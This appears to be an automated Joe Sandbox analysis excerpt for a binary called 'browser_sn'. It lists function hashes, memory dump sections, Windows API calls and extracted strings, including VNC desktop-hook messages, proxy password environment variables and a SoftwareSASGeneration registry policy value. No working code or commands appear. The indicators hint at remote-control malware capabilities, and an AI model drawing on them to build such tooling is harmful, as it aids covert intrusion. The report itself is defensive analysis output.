                                                                            • Opcode ID: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                            • Instruction ID: 7774d28ebaa6a0c6e9f01d095ba868049f57f6dc8f6a8e7e78ca9b0e3491786e
                                                                            • Opcode Fuzzy Hash: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                            • Instruction Fuzzy Hash: 3DB19E22A0868185F794CF25C4587BE7BB1EB86B8EF194132DE8C877A5CFB9D445C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 744660428-3977938048
                                                                            • Opcode ID: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
                                                                            • Instruction ID: d5bfadd0930d955987542897d4bb8aa00f933aa755b92dee4e7414b28e2f77eb
                                                                            • Opcode Fuzzy Hash: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
                                                                            • Instruction Fuzzy Hash: A4B17F22A0868185F790DF25C4587BE7BB1EB86B8EF594032CE8D877A5CFB9E445C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: inet_addr$connectgethostbynamehtonssocket
                                                                            • String ID: 0123456789.
                                                                            • API String ID: 478842821-2088042752
                                                                            • Opcode ID: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                            • Instruction ID: e0d6d61c438d2e2093e91c1132fc78b9b5e6738559014e6f1ad9a00c4a2cdc54
                                                                            • Opcode Fuzzy Hash: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                            • Instruction Fuzzy Hash: 60418062A0865281EA649F22D44007973B0FF88FAEF445232EECD87794EF7CE441C750
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
                                                                            • String ID: ConsoleWindowClass$tty
                                                                            • API String ID: 490048385-1921057836
                                                                            • Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                            • Instruction ID: 8e6294a083c9a54c9518c0a5719088e04f28be7238783ff6340d5603bb69750f
                                                                            • Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                            • Instruction Fuzzy Hash: 39417036708B8586D760CF26E5846A9B7A1FB89B89F444035DF8E83B54DFBCE545CB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wgetenv$_errno_invalid_parameter_noinfo
                                                                            • String ID: CONNECT_PASSWORD$HTTP_PROXY_PASSWORD$SOCKS5_PASSWD$SOCKS5_PASSWORD
                                                                            • API String ID: 1184729097-3964388033
                                                                            • Opcode ID: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                                            • Instruction ID: d7dbbe92e648556512c956f01e82a69b996ee0b685c4d327da687c7a0cf1cc25
                                                                            • Opcode Fuzzy Hash: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                                            • Instruction Fuzzy Hash: 89218C22A1A64340FD95DF25D5912F452E0AF6974EF4C483ADE8DC63A2FEACF855C240
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ChainChangeClipboardCurrentKillThreadTimer
                                                                            • String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                            • API String ID: 3622578367-539335655
                                                                            • Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                            • Instruction ID: c9cae0da6ad7371eedb29e9a9de03b92ca0553e7c1d6f241f6acd963c5e0f851
                                                                            • Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                            • Instruction Fuzzy Hash: 25212C66B0858292F79C9F64D9841F963A5BF4570EF884433CF9EC2291DFBCA565C200
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateOpenValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                            • API String ID: 678895439-3579764778
                                                                            • Opcode ID: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                                            • Instruction ID: 045171830068f774ea52174311988b2c3e6284fafb6b8c738a4604e0f5edda5b
                                                                            • Opcode Fuzzy Hash: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                                            • Instruction Fuzzy Hash: 08110871A18A5286EB508F25F88466A77B4FB84789F401131EBCD83B68DF7CD159CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateDeleteOpenValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                            • API String ID: 2881815620-3579764778
                                                                            • Opcode ID: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                                            • Instruction ID: 03e00c321c9bbada78326a1506ebda237c836625599ae51334484d050ab699a5
                                                                            • Opcode Fuzzy Hash: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                                            • Instruction Fuzzy Hash: 01012A31A18B4282EB909F25F89456A77B4FB84789F401131EBCD83B68DF7CD159CB40
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_invalid_parameter_noinfofreemalloc
                                                                            • String ID:
                                                                            • API String ID: 3646291181-0
                                                                            • Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                            • Instruction ID: b1b28107a32934fc3c8beee5a8193732e83d9711bffac76284b6530641d64bf1
                                                                            • Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                            • Instruction Fuzzy Hash: 14518022A086828AF7A0DF25D5403E926B0FB457ADF544A31EF9E877C6DFBCE4418711
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2819658684-0
                                                                            • Opcode ID: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                                            • Instruction ID: 39a798edb46cceaaeee554e11e1812dc4959e99d5552455a6a505e1099b461cb
                                                                            • Opcode Fuzzy Hash: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                                            • Instruction Fuzzy Hash: 27316E25908B5284EAB09F5195001BE62B0BF59BAAF644A32EFDCC37D6DEECE500C310
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
                                                                            • String ID:
                                                                            • API String ID: 4242051881-0
                                                                            • Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                            • Instruction ID: 16bdad5bccdb16e5c43300660909ba05c57d10f0871f11e1f47fe74f0b05833f
                                                                            • Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                            • Instruction Fuzzy Hash: 5311A825A0AA0685EF84DF62E9A41783774FF95F4EB140472CF8E82364CF6CD459E380
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$CloseInputOpen
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 1367241101-3977938048
                                                                            • Opcode ID: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
                                                                            • Instruction ID: 8533eee4836a91944d6ae3daa74dfe53b7c62f8ae51d06c90250ae1722b71227
                                                                            • Opcode Fuzzy Hash: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
                                                                            • Instruction Fuzzy Hash: 58C19122A0869185F7A08F25C4587FE7BB1EB86B8DF194136CE8C877A5CFB9E445C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$CloseInputOpen
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 1367241101-3977938048
                                                                            • Opcode ID: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
                                                                            • Instruction ID: 75cc437fed6f5740296840b8ed672c564f820aeaaa978c8bcccd008c7e563d8a
                                                                            • Opcode Fuzzy Hash: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
                                                                            • Instruction Fuzzy Hash: 7DB18022A0869185E7A0CF25C4587BE7BB1EB86B8EF594131CE8C877A5CFB9E445C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 186452611-3977938048
                                                                            • Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                            • Instruction ID: 6ebaef245fd90a8e0826d954f08872c0f8c88bfc9146121b43ece580b320eb7c
                                                                            • Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                            • Instruction Fuzzy Hash: 89A18F22A0868185F790DF25C4587BE7BB1EB86B8EF594032CE8C877A5CFB9E445C740
                                                                            APIs
                                                                            • GetDeviceCaps.GDI32 ref: 00007FF6C2BB0113
                                                                            • GetDeviceCaps.GDI32 ref: 00007FF6C2BB0140
                                                                            • GetDeviceCaps.GDI32 ref: 00007FF6C2BB016D
                                                                              • Part of subcall function 00007FF6C2B8A040: OpenInputDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A07A
